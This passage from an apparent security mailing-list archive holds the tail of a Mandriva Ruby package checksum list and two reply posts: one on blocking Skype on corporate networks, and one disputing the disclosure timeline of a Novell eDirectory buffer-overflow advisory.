2006.0/x86_64/ruby-1.8.2-7.4.20060mdk.x86_64.rpm 285d54c1972ecd72f79a14608f3fa455 2006.0/x86_64/ruby-devel-1.8.2-7.4.20060mdk.x86_64.rpm 45f0e3385960d938e9cb13dd0752963e 2006.0/x86_64/ruby-doc-1.8.2-7.4.20060mdk.x86_64.rpm 685b25cd67aa74286cc96bb69eedae33 2006.0/x86_64/ruby-tk-1.8.2-7.4.20060mdk.x86_64.rpm 3a57108ef04cb1efab8640dcb0029fb1 2006.0/SRPMS/ruby-1.8.2-7.4.20060mdk.src.rpm Mandriva Linux 2007.0: f4c71e44767723c560f68611fd5ed40f 2007.0/i586/ruby-1.8.5-2.1mdv2007.0.i586.rpm 9774e776877853e9d8dac21a31ab916c 2007.0/i586/ruby-devel-1.8.5-2.1mdv2007.0.i586.rpm 445edc4e125317acbe21042ba4d81d65 2007.0/i586/ruby-doc-1.8.5-2.1mdv2007.0.i586.rpm 538123be42ba8395c10fbd3252605e50 2007.0/i586/ruby-tk-1.8.5-2.1mdv2007.0.i586.rpm 31e25bf195003a42cd27ff380c350be9 2007.0/SRPMS/ruby-1.8.5-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b1377e678c818d27fa4f9894da35adb2 2007.0/x86_64/ruby-1.8.5-2.1mdv2007.0.x86_64.rpm ef84cbd877282a57b86108acf87e1859 2007.0/x86_64/ruby-devel-1.8.5-2.1mdv2007.0.x86_64.rpm 828ade30bc1505a455f291efc110078c 2007.0/x86_64/ruby-doc-1.8.5-2.1mdv2007.0.x86_64.rpm e5ac4f7397157fc126ae76af869b35e4 2007.0/x86_64/ruby-tk-1.8.5-2.1mdv2007.0.x86_64.rpm 31e25bf195003a42cd27ff380c350be9 2007.0/SRPMS/ruby-1.8.5-2.1mdv2007.0.src.rpm Corporate 3.0: 062a53f26ee73b0e570dec87401bd37e corporate/3.0/i586/ruby-1.8.1-1.7.C30mdk.i586.rpm abb7bbb216dd65e14756c3549053b404 corporate/3.0/i586/ruby-devel-1.8.1-1.7.C30mdk.i586.rpm 87ece8cd4f0ef4309fe8cca98423467a corporate/3.0/i586/ruby-doc-1.8.1-1.7.C30mdk.i586.rpm cfca4b4b06d907d0fae324194a944add corporate/3.0/i586/ruby-tk-1.8.1-1.7.C30mdk.i586.rpm 75afbf41268564d47f5fc9df31f95ab6 corporate/3.0/SRPMS/ruby-1.8.1-1.7.C30mdk.src.rpm Corporate 3.0/X86_64: 5e80b3f821ccbbceaf650469c3a28c2c corporate/3.0/x86_64/ruby-1.8.1-1.7.C30mdk.x86_64.rpm 25b68104a5074ae948125ad78dbaaf1a corporate/3.0/x86_64/ruby-devel-1.8.1-1.7.C30mdk.x86_64.rpm 9e4938f74c6ea5a7198c281dbbecdf0a corporate/3.0/x86_64/ruby-doc-1.8.1-1.7.C30mdk.x86_64.rpm 4f1315fd9c95e5241e3978890a730bbe corporate/3.0/x86_64/ruby-tk-1.8.1-1.7.C30mdk.x86_64.rpm 75afbf41268564d47f5fc9df31f95ab6 corporate/3.0/SRPMS/ruby-1.8.1-1.7.C30mdk.src.rpm Corporate 4.0: ba740fba1e7362102a1ce5e19392bbca corporate/4.0/i586/ruby-1.8.2-7.4.20060mlcs4.i586.rpm 5e73abcddf887587d1e845be09f95c3e corporate/4.0/i586/ruby-devel-1.8.2-7.4.20060mlcs4.i586.rpm f08a296b52bc64dfe626ca88718c0a8e corporate/4.0/i586/ruby-doc-1.8.2-7.4.20060mlcs4.i586.rpm 7faf87d0e62775fe46a3b9f05f677fb4 corporate/4.0/i586/ruby-tk-1.8.2-7.4.20060mlcs4.i586.rpm 2a7981a830a7a9384b5ed2a3272d9aaa corporate/4.0/SRPMS/ruby-1.8.2-7.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 05ecad036963dc16c0e5cd0bfb04efed corporate/4.0/x86_64/ruby-1.8.2-7.4.20060mlcs4.x86_64.rpm 71dd68f19989395dab35168a1338f25b corporate/4.0/x86_64/ruby-devel-1.8.2-7.4.20060mlcs4.x86_64.rpm 7199919374de62c24cb15cf879a88dbe corporate/4.0/x86_64/ruby-doc-1.8.2-7.4.20060mlcs4.x86_64.rpm 35f6c32ce1c9d93f36f60dae3a1f41d5 corporate/4.0/x86_64/ruby-tk-1.8.2-7.4.20060mlcs4.x86_64.rpm 2a7981a830a7a9384b5ed2a3272d9aaa corporate/4.0/SRPMS/ruby-1.8.2-7.4.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed
Re: [Full-disclosure] [ Capture Skype trafic ]
gabriel rosenkoetter wrote: (That said... keeping people from using Skype on a corporate network is an HR problem, not a network management/security problem, methinks, just like any P2P software.) Huh?? Final enforcement may be an HR problem, but if your corporate IT policies and system designs allow arbitrary users to run arbitrary, non- endorsed, perhaps not properly licensed, etc, etc, etc applications then your systems as a whole have much larger problems than Skype- stolen bandwidth usage... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
On 10/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since October 26, 2006 by Digital Vaccine protection filter ID 4519. For further product information on the TippingPoint IPS: snip The specific flaw exists within the httpstk.dll library within the dhost.exe web interface of the eDirectory Host Environment. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. This results in an exploitable stack-based buffer overflow. This 0day was reported on 10/20/06 here http://www.mnin.org/advisories/2006_novell_httpstk.pdf. Seems that your initiative has fallen a bit behind. Your customers had to wait for you to realize this had already been released and a signature was added to Bleeding Snort on 10/23. It's also a bit odd that Novell released the updates on 10/20/06, the same day as the MNIN advisory. Based on the time line it looks like the whole thing might have been ripped off. Cheers, Matt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/